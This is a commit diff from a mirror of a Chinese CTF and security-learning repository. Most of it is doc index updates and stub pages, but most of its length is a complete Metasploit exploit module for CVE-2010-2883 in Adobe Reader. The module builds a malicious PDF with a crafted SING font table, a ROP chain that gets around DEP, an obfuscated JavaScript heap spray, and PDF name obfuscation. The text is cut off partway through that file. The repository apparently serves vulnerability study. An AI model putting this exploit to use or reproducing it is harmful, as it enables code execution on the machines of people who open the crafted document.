mirror of
https://github.com/nganhkhoa/CTF-All-In-One.git
synced 2024-12-24 03:01:15 +07:00
fix
This commit is contained in:
parent
382cad2cdb
commit
9c5d6239c3
@ -59,6 +59,7 @@ GitHub 地址:https://github.com/firmianay/CTF-All-In-One
|
||||
* [2.4.4 binwalk](doc/2.4.4_binwalk.md)
|
||||
* [2.4.5 Burp Suite](doc/2.4.5_burpsuite.md)
|
||||
* [2.4.6 Wireshark](doc/2.4.6_wireshark.md)
|
||||
* [2.4.7 Cuckoo Sandbox](doc/2.4.7_cuckoo.md)
|
||||
* [三、分类专题篇](doc/3_topics.md)
|
||||
* Pwn
|
||||
* [3.1.1 格式化字符串漏洞](doc/3.1.1_format_string.md)
|
||||
@ -156,10 +157,11 @@ GitHub 地址:https://github.com/firmianay/CTF-All-In-One
|
||||
* Reverse
|
||||
* [6.2.1 re XHPCTF2017 dont_panic](doc/6.2.1_re_xhpctf2017_dont_panic.md)
|
||||
* [6.2.2 re ECTF2016 tayy](doc/6.2.2_re_ectf2016_tayy.md)
|
||||
* [6.2.3 re Codegate2017 angrybird](doc/6.2.3_re_codegate2017_angrybird.md)
|
||||
* [6.2.3 re CodegateCTF2017 angrybird](doc/6.2.3_re_codegatectf2017_angrybird.md)
|
||||
* [6.2.4 re CSAWCTF2015 wyvern](doc/6.2.4_re_csawctf2015_wyvern.md)
|
||||
* [6.2.5 re PicoCTF2014 Baleful](doc/6.2.5_re_picoctf2014_baleful.md)
|
||||
* [6.2.6 re SECCON2017 printf_machine](doc/6.2.6_re_seccon2017_printf_machine.md)
|
||||
* [6.2.6 re SECCONCTF2017 printf_machine](doc/6.2.6_re_secconctf2017_printf_machine.md)
|
||||
* [6.2.7 re CodegateCTF2018 RedVelvet](doc/6.2.7_re_codegatectf2018_redvelvet.md)
|
||||
* Web
|
||||
* [6.3.1 web HCTF2017 babycrack](doc/6.3.1_web_hctf2017_babycrack.md)
|
||||
* Crypto
|
||||
@ -175,7 +177,7 @@ GitHub 地址:https://github.com/firmianay/CTF-All-In-One
|
||||
* [7.1.6 CVE-2017-9430 DNSTracer 栈溢出漏洞](doc/7.1.6_dnstracer_2017-9430.md)
|
||||
* [7.1.7 CVE-2018-6323 GNU binutils elf_object_p 整型溢出漏洞](doc/7.1.7_binutils_2018-6323.md)
|
||||
* [7.1.8 CVE-2010-2883 Adobe CoolType SING 表栈溢出漏洞](doc/7.1.8_adobe_reader_2010-2883.md)
|
||||
* [7.1.9 CVE-2010-2333 Microsoft Word RTF pFragments 栈溢出漏洞](doc/7.1.9_ms_word_2010-2333.md)
|
||||
* [7.1.9 CVE-2010-3333 Microsoft Word RTF pFragments 栈溢出漏洞](doc/7.1.9_ms_word_2010-3333.md)
|
||||
* Malware
|
||||
* [八、学术篇](doc/8_academic.md)
|
||||
* [8.1 The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls (on the x86)](doc/8.1_ret2libc_without_func_calls.md)
|
||||
|
@ -1,10 +1,21 @@
|
||||
# 2.3.2 OllyDbg 调试器
|
||||
|
||||
- [快捷键](#快捷键)
|
||||
- [命令行插件](#命令行插件)
|
||||
- [参考资料](#参考资料)
|
||||
|
||||
|
||||
## 快捷键
|
||||
- F2:在光标选定位置按 F2 键设置或取消断点。
|
||||
- F4:运行到光标选定位置处暂停。
|
||||
- F7:单步步入:每次执行一条指令,遇到 call 等子程序时进入其中。
|
||||
- F8:单步步过,每次执行一条指令,遇到 call 等子程序时不进入其中。
|
||||
- F9:运行,被调试软件继续运行,直到遇到下一个断点。
|
||||
- Ctrl+F9:执行到返回,在执行到一个 ret 指令时暂停,常用于从当前函数快速返回到上一个函数。
|
||||
- Alt+F9:执行到用户代码,可用于从系统部分快速返回到被调试程序部分。
|
||||
|
||||
|
||||
## 命令行插件
|
||||
|
||||
## 参考资料
|
||||
- http://www.ollydbg.de/
|
||||
|
13
doc/2.4.7_cuckoo.md
Normal file
13
doc/2.4.7_cuckoo.md
Normal file
@ -0,0 +1,13 @@
|
||||
# 2.4.7 Cuckoo Sandbox
|
||||
|
||||
- [简介](#简介)
|
||||
- [安装](#安装)
|
||||
- [参考资料](#参考资料)
|
||||
|
||||
|
||||
## 简介
|
||||
|
||||
## 安装
|
||||
|
||||
## 参考资料
|
||||
- https://cuckoosandbox.org/
|
@ -24,3 +24,4 @@
|
||||
* [2.4.4 binwalk](2.4.4_binwalk.md)
|
||||
* [2.4.5 Burp Suite](2.4.5_burpsuite.md)
|
||||
* [2.4.6 Wireshark](2.4.6_wireshark.md)
|
||||
* [2.4.7 Cuckoo Sandbox](2.4.7_cuckoo.md)
|
||||
|
@ -23,7 +23,6 @@
|
||||
```
|
||||
$ git clone https://github.com/Z3Prover/z3.git
|
||||
$ cd z3
|
||||
|
||||
$ python scripts/mk_make.py --python
|
||||
$ cd build
|
||||
$ make
|
||||
|
@ -2,5 +2,7 @@
|
||||
|
||||
- [参考资料](#参考资料)
|
||||
|
||||
|
||||
## 参考资料
|
||||
- [Quick introduction into SAT/SMT solvers and symbolic execution](https://yurichev.com/writings/SAT_SMT_draft-EN.pdf)
|
||||
- [Practical Symbolic Execution and SATisfiability Module Theories (SMT) 101](http://deniable.org/reversing/symbolic-execution)
|
||||
|
@ -1,10 +1,10 @@
|
||||
# 6.2.3 re Codegate2017 angrybird
|
||||
# 6.2.3 re CodegateCTF2017 angrybird
|
||||
|
||||
- [题目解析](#题目解析)
|
||||
- [参考资料](#参考资料)
|
||||
|
||||
|
||||
[下载文件](../src/writeup/6.2.3_re_codegate2017_angrybird)
|
||||
[下载文件](../src/writeup/6.2.3_re_codegatectf2017_angrybird)
|
||||
|
||||
## 题目解析
|
||||
看题目就知道,这是一个会让我们抓狂的程序,事实也确实如此。
|
||||
@ -266,3 +266,4 @@ you typed : Im_so_cute&pretty_:)
|
||||
|
||||
|
||||
## 参考资料
|
||||
- https://ctftime.org/task/3375
|
@ -1,10 +1,10 @@
|
||||
# 6.2.6 re SECCON2017 printf_machine
|
||||
# 6.2.6 re SECCONCTF2017 printf_machine
|
||||
|
||||
- [题目解析](#题目解析)
|
||||
- [参考资料](#参考资料)
|
||||
|
||||
|
||||
[下载文件](../src/writeup/6.2.6_re_seccon2017_printf_machine)
|
||||
[下载文件](../src/writeup/6.2.6_re_secconctf2017_printf_machine)
|
||||
|
||||
## 题目解析
|
||||
```
|
||||
@ -14,4 +14,5 @@ fsmachine: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically l
|
||||
|
||||
|
||||
## 参考资料
|
||||
- https://ctftime.org/task/5042
|
||||
- [400_printf_machine](https://github.com/SECCON/SECCON2017_online_CTF/tree/master/binary/400_printf_machine)
|
17
doc/6.2.7_re_codegatectf2018_redvelvet.md
Normal file
17
doc/6.2.7_re_codegatectf2018_redvelvet.md
Normal file
@ -0,0 +1,17 @@
|
||||
# 6.2.7 re CodegateCTF2018 RedVelvet
|
||||
|
||||
- [题目解析](#题目解析)
|
||||
- [参考资料](#参考资料)
|
||||
|
||||
|
||||
[下载文件](../src/writeup/6.2.7_re_codegatectf2018_redvelvet)
|
||||
|
||||
## 题目解析
|
||||
```
|
||||
$ file RedVelvet
|
||||
RedVelvet: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=84e7ef91c33878cf9eefc00a7a450895aa573494, not stripped
|
||||
```
|
||||
|
||||
|
||||
## 参考资料
|
||||
- https://ctftime.org/task/5231
|
@ -4,6 +4,8 @@
|
||||
- [解题流程](#解题流程)
|
||||
|
||||
|
||||
[下载文件](../src/writeup/6.3.1_web_hctf2017_babycrack)
|
||||
|
||||
## 题目解析
|
||||
题目就不用多说了,很容易发现是 JavaScript 代码审计。
|
||||
|
||||
|
@ -32,10 +32,11 @@
|
||||
* Reverse
|
||||
* [6.2.1 re XHPCTF2017 dont_panic](6.2.1_re_xhpctf2017_dont_panic.md)
|
||||
* [6.2.2 re ECTF2016 tayy](6.2.2_re_ectf2016_tayy.md)
|
||||
* [6.2.3 re Codegate2017 angrybird](6.2.3_re_codegate2017_angrybird.md)
|
||||
* [6.2.3 re CodegateCTF2017 angrybird](6.2.3_re_codegatectf2017_angrybird.md)
|
||||
* [6.2.4 re CSAWCTF2015 wyvern](6.2.4_re_csawctf2015_wyvern.md)
|
||||
* [6.2.5 re PicoCTF2014 Baleful](6.2.5_re_picoctf2014_baleful.md)
|
||||
* [6.2.6 re SECCON2017 printf_machine](6.2.6_re_seccon2017_printf_machine.md)
|
||||
* [6.2.6 re SECCONCTF2017 printf_machine](6.2.6_re_secconctf2017_printf_machine.md)
|
||||
* [6.2.7 re CodegateCTF2018 RedVelvet](6.2.7_re_codegatectf2018_redvelvet.md)
|
||||
* Web
|
||||
* [6.3.1 web HCTF2017 babycrack](6.3.1_web_hctf2017_babycrack.md)
|
||||
* Crypto
|
||||
|
@ -17,6 +17,7 @@ Adobe Reader 和 Acrobat 9.4 之前版本的 CoolType.dll 中存在基于栈的
|
||||
| --- | --- | --- |
|
||||
| 操作系统 | Windows XP SP3 | 体系结构:32 位 |
|
||||
| 调试器 | OllyDbg | 版本号:吾爱专版 |
|
||||
| 反汇编器 | IDA Pro | 版本号:6.8 |
|
||||
| 漏洞软件 | Adobe Reader | 版本号:9.3.4 |
|
||||
|
||||
我们利用 Metasploit 来生成攻击样本:
|
||||
|
@ -1,18 +0,0 @@
|
||||
# 7.1.9 CVE-2010-2333 Microsoft Word RTF pFragments 栈溢出漏洞
|
||||
|
||||
- [漏洞描述](#漏洞描述)
|
||||
- [漏洞复现](#漏洞复现)
|
||||
- [漏洞分析](#漏洞分析)
|
||||
- [参考资料](#参考资料)
|
||||
|
||||
|
||||
[下载文件](../src/exploit/7.1.9_ms_word_2010-2333)
|
||||
|
||||
## 漏洞描述
|
||||
|
||||
## 漏洞复现
|
||||
|
||||
## 漏洞分析
|
||||
|
||||
## 参考资料
|
||||
- https://www.cvedetails.com/cve/CVE-2010-2333
|
29
doc/7.1.9_ms_word_2010-3333.md
Normal file
29
doc/7.1.9_ms_word_2010-3333.md
Normal file
@ -0,0 +1,29 @@
|
||||
# 7.1.9 cve-2010-3333 Microsoft Word RTF pFragments 栈溢出漏洞
|
||||
|
||||
- [漏洞描述](#漏洞描述)
|
||||
- [漏洞复现](#漏洞复现)
|
||||
- [漏洞分析](#漏洞分析)
|
||||
- [参考资料](#参考资料)
|
||||
|
||||
|
||||
[下载文件](../src/exploit/7.1.9_ms_word_2010-3333)
|
||||
|
||||
## 漏洞描述
|
||||
cve-2010-3333 漏洞是一个栈溢出漏洞,该漏洞是由于 Microsoft Office 软件中的 Open XML 文件格式转换器在处理 RTF 中的 "pFragments" 属性时存在栈溢出,可能导致任意代码执行。受影响的版本有:MS Office 2003 SP3、Office 2007 SP0、Office 2010 等。
|
||||
|
||||
|
||||
## 漏洞复现
|
||||
| |推荐使用的环境 | 备注 |
|
||||
| --- | --- | --- |
|
||||
| 操作系统 | Windows XP SP3 | 体系结构:32 位 |
|
||||
| 调试器 | OllyDbg | 版本号:吾爱专版 |
|
||||
| 反汇编器 | IDA Pro | 版本号:7.0 |
|
||||
| 漏洞软件 | MS Office | 版本号:2003 SP3 |
|
||||
|
||||
我们利用 Metasploit 来生成攻击样本
|
||||
|
||||
|
||||
## 漏洞分析
|
||||
|
||||
## 参考资料
|
||||
- https://www.cvedetails.com/cve/CVE-2010-2333
|
@ -9,5 +9,5 @@
|
||||
* [7.1.6 CVE-2017-9430 DNSTracer 栈溢出漏洞](7.1.6_dnstracer_2017-9430.md)
|
||||
* [7.1.7 CVE-2018-6323 GNU binutils elf_object_p 整型溢出漏洞](7.1.7_binutils_2018-6323.md)
|
||||
* [7.1.8 CVE-2010-2883 Adobe CoolType SING 表栈溢出漏洞](7.1.8_adobe_reader_2010-2883.md)
|
||||
* [7.1.9 CVE-2010-2333 Microsoft Word RTF pFragments 栈溢出漏洞](7.1.9_ms_word_2010-2333.md)
|
||||
* [7.1.9 CVE-2010-3333 Microsoft Word RTF pFragments 栈溢出漏洞](7.1.9_ms_word_2010-3333.md)
|
||||
* Malware
|
||||
|
562
src/exploit/7.1.8_adobe_reader_2010-2883/adobe_cooltype_sing.rb
Normal file
562
src/exploit/7.1.8_adobe_reader_2010-2883/adobe_cooltype_sing.rb
Normal file
@ -0,0 +1,562 @@
|
||||
##
|
||||
# This module requires Metasploit: https://metasploit.com/download
|
||||
# Current source: https://github.com/rapid7/metasploit-framework
|
||||
##
|
||||
|
||||
require 'zlib'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
Rank = GreatRanking # aslr+dep bypass, js heap spray, rop, stack bof
|
||||
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a vulnerability in the Smart INdependent Glyplets (SING) table
|
||||
handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior versions are
|
||||
assumed to be vulnerable as well.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
[
|
||||
'Unknown', # 0day found in the wild
|
||||
'sn0wfl0w', # initial analysis, also @vicheck on twitter
|
||||
'jduck' # Metasploit module
|
||||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2010-2883' ],
|
||||
[ 'OSVDB', '67849'],
|
||||
[ 'URL', 'http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html' ],
|
||||
[ 'URL', 'http://www.adobe.com/support/security/advisories/apsa10-02.html' ]
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'EXITFUNC' => 'process',
|
||||
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
|
||||
'DisablePayloadHandler' => 'true',
|
||||
},
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 1000,
|
||||
'BadChars' => "\x00",
|
||||
'DisableNops' => true
|
||||
},
|
||||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
# Tested OK via Adobe Reader 9.3.4 on Windows XP SP3 -jjd
|
||||
# Tested OK via Adobe Reader 9.3.4 on Windows 7 -jjd
|
||||
# Tested OK via Adobe Reader 9.3 on XP and 7 -todb
|
||||
[ 'Automatic', { }],
|
||||
],
|
||||
'DisclosureDate' => 'Sep 07 2010',
|
||||
'DefaultTarget' => 0))
|
||||
|
||||
register_options(
|
||||
[
|
||||
OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),
|
||||
])
|
||||
end
|
||||
|
||||
def exploit
|
||||
ttf_data = make_ttf()
|
||||
|
||||
js_data = make_js(payload.encoded)
|
||||
|
||||
# Create the pdf
|
||||
pdf = make_pdf(ttf_data, js_data)
|
||||
|
||||
print_status("Creating '#{datastore['FILENAME']}' file...")
|
||||
|
||||
file_create(pdf)
|
||||
end
|
||||
|
||||
def make_ttf
|
||||
ttf_data = ""
|
||||
|
||||
# load the static ttf file
|
||||
|
||||
# NOTE: The 0day used Vera.ttf (785d2fd45984c6548763ae6702d83e20)
|
||||
path = File.join( Msf::Config.data_directory, "exploits", "cve-2010-2883.ttf" )
|
||||
fd = File.open( path, "rb" )
|
||||
ttf_data = fd.read(fd.stat.size)
|
||||
fd.close
|
||||
|
||||
# Build the SING table
|
||||
sing = ''
|
||||
sing << [
|
||||
0, 1, # tableVersionMajor, tableVersionMinor (0.1)
|
||||
0xe01, # glyphletVersion
|
||||
0x100, # embeddingInfo
|
||||
0, # mainGID
|
||||
0, # unitsPerEm
|
||||
0, # vertAdvance
|
||||
0x3a00 # vertOrigin
|
||||
].pack('vvvvvvvv')
|
||||
# uniqueName
|
||||
# "The uniqueName string must be a string of at most 27 7-bit ASCII characters"
|
||||
#sing << "A" * (0x254 - sing.length)
|
||||
sing << rand_text(0x254 - sing.length)
|
||||
|
||||
# 0xffffffff gets written here @ 0x7001400 (in BIB.dll)
|
||||
sing[0x140, 4] = [0x4a8a08e2 - 0x1c].pack('V')
|
||||
|
||||
# This becomes our new EIP (puts esp to stack buffer)
|
||||
ret = 0x4a80cb38 # add ebp, 0x794 / leave / ret
|
||||
sing[0x208, 4] = [ret].pack('V')
|
||||
|
||||
# This becomes the new eip after the first return
|
||||
ret = 0x4a82a714
|
||||
sing[0x18, 4] = [ret].pack('V')
|
||||
|
||||
# This becomes the new esp after the first return
|
||||
esp = 0x0c0c0c0c
|
||||
sing[0x1c, 4] = [esp].pack('V')
|
||||
|
||||
# Without the following, sub_801ba57 returns 0.
|
||||
sing[0x24c, 4] = [0x6c].pack('V')
|
||||
|
||||
ttf_data[0xec, 4] = "SING"
|
||||
ttf_data[0x11c, sing.length] = sing
|
||||
|
||||
ttf_data
|
||||
end
|
||||
|
||||
def make_js(encoded_payload)
|
||||
|
||||
# The following executes a ret2lib using icucnv36.dll
|
||||
# The effect is to bypass DEP and execute the shellcode in an indirect way
|
||||
stack_data = [
|
||||
0x41414141, # unused
|
||||
0x4a8063a5, # pop ecx / ret
|
||||
0x4a8a0000, # becomes ecx
|
||||
|
||||
0x4a802196, # mov [ecx],eax / ret # save whatever eax starts as
|
||||
|
||||
0x4a801f90, # pop eax / ret
|
||||
0x4a84903c, # becomes eax (import for CreateFileA)
|
||||
|
||||
# -- call CreateFileA
|
||||
0x4a80b692, # jmp [eax]
|
||||
|
||||
0x4a801064, # ret
|
||||
|
||||
0x4a8522c8, # first arg to CreateFileA (lpFileName / pointer to "iso88591")
|
||||
0x10000000, # second arg - dwDesiredAccess
|
||||
0x00000000, # third arg - dwShareMode
|
||||
0x00000000, # fourth arg - lpSecurityAttributes
|
||||
0x00000002, # fifth arg - dwCreationDisposition
|
||||
0x00000102, # sixth arg - dwFlagsAndAttributes
|
||||
0x00000000, # seventh arg - hTemplateFile
|
||||
|
||||
0x4a8063a5, # pop ecx / ret
|
||||
0x4a801064, # becomes ecx
|
||||
|
||||
0x4a842db2, # xchg eax,edi / ret
|
||||
|
||||
0x4a802ab1, # pop ebx / ret
|
||||
0x00000008, # becomes ebx - offset to modify
|
||||
|
||||
#
|
||||
# This points at a neat-o block of code that ... TBD
|
||||
#
|
||||
# and [esp+ebx*2],edi
|
||||
# jne check_slash
|
||||
# ret_one:
|
||||
# mov al,1
|
||||
# ret
|
||||
# check_slash:
|
||||
# cmp al,0x2f
|
||||
# je ret_one
|
||||
# cmp al,0x41
|
||||
# jl check_lower
|
||||
# cmp al,0x5a
|
||||
# jle check_ptr
|
||||
# check_lower:
|
||||
# cmp al,0x61
|
||||
# jl ret_zero
|
||||
# cmp al,0x7a
|
||||
# jg ret_zero
|
||||
# cmp [ecx+1],0x3a
|
||||
# je ret_one
|
||||
# ret_zero:
|
||||
# xor al,al
|
||||
# ret
|
||||
#
|
||||
|
||||
0x4a80a8a6, # execute fun block
|
||||
|
||||
0x4a801f90, # pop eax / ret
|
||||
0x4a849038, # becomes eax (import for CreateFileMappingA)
|
||||
|
||||
# -- call CreateFileMappingA
|
||||
0x4a80b692, # jmp [eax]
|
||||
|
||||
0x4a801064, # ret
|
||||
|
||||
0xffffffff, # arguments to CreateFileMappingA, hFile
|
||||
0x00000000, # lpAttributes
|
||||
0x00000040, # flProtect
|
||||
0x00000000, # dwMaximumSizeHigh
|
||||
0x00010000, # dwMaximumSizeLow
|
||||
0x00000000, # lpName
|
||||
|
||||
0x4a8063a5, # pop ecx / ret
|
||||
0x4a801064, # becomes ecx
|
||||
|
||||
0x4a842db2, # xchg eax,edi / ret
|
||||
|
||||
0x4a802ab1, # pop ebx / ret
|
||||
0x00000008, # becomes ebx - offset to modify
|
||||
|
||||
0x4a80a8a6, # execute fun block
|
||||
|
||||
0x4a801f90, # pop eax / ret
|
||||
0x4a849030, # becomes eax (import for MapViewOfFile
|
||||
|
||||
# -- call MapViewOfFile
|
||||
0x4a80b692, # jmp [eax]
|
||||
|
||||
0x4a801064, # ret
|
||||
|
||||
0xffffffff, # args to MapViewOfFile - hFileMappingObject
|
||||
0x00000022, # dwDesiredAccess
|
||||
0x00000000, # dwFileOffsetHigh
|
||||
0x00000000, # dwFileOffsetLow
|
||||
0x00010000, # dwNumberOfBytesToMap
|
||||
|
||||
0x4a8063a5, # pop ecx / ret
|
||||
0x4a8a0004, # becomes ecx - writable pointer
|
||||
|
||||
0x4a802196, # mov [ecx],eax / ret - save map base addr
|
||||
|
||||
0x4a8063a5, # pop ecx / ret
|
||||
0x4a801064, # becomes ecx - ptr to ret
|
||||
|
||||
0x4a842db2, # xchg eax,edi / ret
|
||||
|
||||
0x4a802ab1, # pop ebx / ret
|
||||
0x00000030, # becomes ebx - offset to modify
|
||||
|
||||
0x4a80a8a6, # execute fun block
|
||||
|
||||
0x4a801f90, # pop eax / ret
|
||||
0x4a8a0004, # becomes eax - saved file mapping ptr
|
||||
|
||||
0x4a80a7d8, # mov eax,[eax] / ret - load saved mapping ptr
|
||||
|
||||
0x4a8063a5, # pop ecx / ret
|
||||
0x4a801064, # becomes ecx - ptr to ret
|
||||
|
||||
0x4a842db2, # xchg eax,edi / ret
|
||||
|
||||
0x4a802ab1, # pop ebx / ret
|
||||
0x00000020, # becomes ebx - offset to modify
|
||||
|
||||
0x4a80a8a6, # execute fun block
|
||||
|
||||
0x4a8063a5, # pop ecx / ret
|
||||
0x4a801064, # becomes ecx - ptr to ret
|
||||
|
||||
0x4a80aedc, # lea edx,[esp+0xc] / push edx / push eax / push [esp+0xc] / push [0x4a8a093c] / call ecx / add esp, 0x10 / ret
|
||||
|
||||
0x4a801f90, # pop eax / ret
|
||||
0x00000034, # becomes eax
|
||||
|
||||
0x4a80d585, # add eax,edx / ret
|
||||
|
||||
0x4a8063a5, # pop ecx / ret
|
||||
0x4a801064, # becomes ecx - ptr to ret
|
||||
|
||||
0x4a842db2, # xchg eax,edi / ret
|
||||
|
||||
0x4a802ab1, # pop ebx / ret
|
||||
0x0000000a, # becomes ebx - offset to modify
|
||||
|
||||
0x4a80a8a6, # execute fun block
|
||||
|
||||
0x4a801f90, # pop eax / ret
|
||||
0x4a849170, # becomes eax (import for memcpy)
|
||||
|
||||
# -- call memcpy
|
||||
0x4a80b692, # jmp [eax]
|
||||
|
||||
0xffffffff, # this stuff gets overwritten by the block at 0x4a80aedc, becomes ret from memcpy
|
||||
0xffffffff, # becomes first arg to memcpy (dst)
|
||||
0xffffffff, # becomes second arg to memcpy (src)
|
||||
0x00001000, # becomes third arg to memcpy (length)
|
||||
#0x0000258b, # ??
|
||||
#0x4d4d4a8a, # ??
|
||||
].pack('V*')
|
||||
|
||||
var_unescape = rand_text_alpha(rand(100) + 1)
|
||||
var_shellcode = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
var_start = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
var_s = 0x10000
|
||||
var_c = rand_text_alpha(rand(100) + 1)
|
||||
var_b = rand_text_alpha(rand(100) + 1)
|
||||
var_d = rand_text_alpha(rand(100) + 1)
|
||||
var_3 = rand_text_alpha(rand(100) + 1)
|
||||
var_i = rand_text_alpha(rand(100) + 1)
|
||||
var_4 = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
payload_buf = ''
|
||||
payload_buf << stack_data
|
||||
payload_buf << encoded_payload
|
||||
|
||||
escaped_payload = Rex::Text.to_unescape(payload_buf)
|
||||
|
||||
js = %Q|
|
||||
var #{var_unescape} = unescape;
|
||||
var #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' );
|
||||
var #{var_c} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
|
||||
while (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c};
|
||||
#{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2);
|
||||
#{var_b} += #{var_shellcode};
|
||||
#{var_b} += #{var_c};
|
||||
#{var_d} = #{var_b}.substring(0, #{var_s}/2);
|
||||
while(#{var_d}.length < 0x80000) #{var_d} += #{var_d};
|
||||
#{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2);
|
||||
var #{var_4} = new Array();
|
||||
for (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+"s";
|
||||
|
|
||||
|
||||
js
|
||||
end
|
||||
|
||||
def random_non_ascii_string(count)
|
||||
result = ""
|
||||
count.times do
|
||||
result << (rand(128) + 128).chr
|
||||
end
|
||||
result
|
||||
end
|
||||
|
||||
def io_def(id)
|
||||
"%d 0 obj \n" % id
|
||||
end
|
||||
|
||||
def io_ref(id)
|
||||
"%d 0 R" % id
|
||||
end
|
||||
|
||||
|
||||
#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
|
||||
def n_obfu(str)
|
||||
#return str
|
||||
result = ""
|
||||
str.scan(/./u) do |c|
|
||||
if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'
|
||||
result << "#%x" % c.unpack("C*")[0]
|
||||
else
|
||||
result << c
|
||||
end
|
||||
end
|
||||
result
|
||||
end
|
||||
|
||||
|
||||
def ascii_hex_whitespace_encode(str)
|
||||
result = ""
|
||||
whitespace = ""
|
||||
str.each_byte do |b|
|
||||
result << whitespace << "%02x" % b
|
||||
whitespace = " " * (rand(3) + 1)
|
||||
end
|
||||
result << ">"
|
||||
end
|
||||
|
||||
|
||||
def make_pdf(ttf, js)
|
||||
|
||||
#swf_name = rand_text_alpha(8 + rand(8)) + ".swf"
|
||||
|
||||
xref = []
|
||||
eol = "\n"
|
||||
endobj = "endobj" << eol
|
||||
|
||||
# Randomize PDF version?
|
||||
pdf = "%PDF-1.5" << eol
|
||||
pdf << "%" << random_non_ascii_string(4) << eol
|
||||
|
||||
# catalog
|
||||
xref << pdf.length
|
||||
pdf << io_def(1) << n_obfu("<<") << eol
|
||||
pdf << n_obfu("/Pages ") << io_ref(2) << eol
|
||||
pdf << n_obfu("/Type /Catalog") << eol
|
||||
pdf << n_obfu("/OpenAction ") << io_ref(11) << eol
|
||||
# The AcroForm is required to get icucnv36.dll to load
|
||||
pdf << n_obfu("/AcroForm ") << io_ref(13) << eol
|
||||
pdf << n_obfu(">>") << eol
|
||||
pdf << endobj
|
||||
|
||||
# pages array
|
||||
xref << pdf.length
|
||||
pdf << io_def(2) << n_obfu("<<") << eol
|
||||
pdf << n_obfu("/MediaBox ") << io_ref(3) << eol
|
||||
pdf << n_obfu("/Resources ") << io_ref(4) << eol
|
||||
pdf << n_obfu("/Kids [") << io_ref(5) << "]" << eol
|
||||
pdf << n_obfu("/Count 1") << eol
|
||||
pdf << n_obfu("/Type /Pages") << eol
|
||||
pdf << n_obfu(">>") << eol
|
||||
pdf << endobj
|
||||
|
||||
# media box
|
||||
xref << pdf.length
|
||||
pdf << io_def(3)
|
||||
pdf << "[0 0 595 842]" << eol
|
||||
pdf << endobj
|
||||
|
||||
# resources
|
||||
xref << pdf.length
|
||||
pdf << io_def(4)
|
||||
pdf << n_obfu("<<") << eol
|
||||
pdf << n_obfu("/Font ") << io_ref(6) << eol
|
||||
pdf << ">>" << eol
|
||||
pdf << endobj
|
||||
|
||||
# page 1
|
||||
xref << pdf.length
|
||||
pdf << io_def(5) << n_obfu("<<") << eol
|
||||
pdf << n_obfu("/Parent ") << io_ref(2) << eol
|
||||
pdf << n_obfu("/MediaBox ") << io_ref(3) << eol
|
||||
pdf << n_obfu("/Resources ") << io_ref(4) << eol
|
||||
pdf << n_obfu("/Contents [") << io_ref(8) << n_obfu("]") << eol
|
||||
pdf << n_obfu("/Type /Page") << eol
|
||||
pdf << n_obfu(">>") << eol # end obj dict
|
||||
pdf << endobj
|
||||
|
||||
# font
|
||||
xref << pdf.length
|
||||
pdf << io_def(6) << n_obfu("<<") << eol
|
||||
pdf << n_obfu("/F1 ") << io_ref(7) << eol
|
||||
pdf << ">>" << eol
|
||||
pdf << endobj
|
||||
|
||||
# ttf object
|
||||
xref << pdf.length
|
||||
pdf << io_def(7) << n_obfu("<<") << eol
|
||||
pdf << n_obfu("/Type /Font") << eol
|
||||
pdf << n_obfu("/Subtype /TrueType") << eol
|
||||
pdf << n_obfu("/Name /F1") << eol
|
||||
pdf << n_obfu("/BaseFont /Cinema") << eol
|
||||
pdf << n_obfu("/Widths []") << eol
|
||||
pdf << n_obfu("/FontDescriptor ") << io_ref(9)
|
||||
pdf << n_obfu("/Encoding /MacRomanEncoding")
|
||||
pdf << n_obfu(">>") << eol
|
||||
pdf << endobj
|
||||
|
||||
# page content
|
||||
content = "Hello World!"
|
||||
content = "" +
|
||||
"0 g" + eol +
|
||||
"BT" + eol +
|
||||
"/F1 32 Tf" + eol +
|
||||
"32 Tc" + eol +
|
||||
"1 0 0 1 32 773.872 Tm" + eol +
|
||||
"(" + content + ") Tj" + eol +
|
||||
"ET"
|
||||
|
||||
xref << pdf.length
|
||||
pdf << io_def(8) << "<<" << eol
|
||||
pdf << n_obfu("/Length %s" % content.length) << eol
|
||||
pdf << ">>" << eol
|
||||
pdf << "stream" << eol
|
||||
pdf << content << eol
|
||||
pdf << "endstream" << eol
|
||||
pdf << endobj
|
||||
|
||||
# font descriptor
|
||||
xref << pdf.length
|
||||
pdf << io_def(9) << n_obfu("<<")
|
||||
pdf << n_obfu("/Type/FontDescriptor/FontName/Cinema")
|
||||
pdf << n_obfu("/Flags %d" % (2**2 + 2**6 + 2**17))
|
||||
pdf << n_obfu("/FontBBox [-177 -269 1123 866]")
|
||||
pdf << n_obfu("/FontFile2 ") << io_ref(10)
|
||||
pdf << n_obfu(">>") << eol
|
||||
pdf << endobj
|
||||
|
||||
# ttf stream
|
||||
xref << pdf.length
